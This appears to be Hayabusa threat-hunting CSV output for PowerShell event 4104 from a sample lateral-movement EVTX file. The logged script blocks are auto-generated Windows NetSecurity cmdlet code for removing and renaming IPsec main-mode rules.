ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 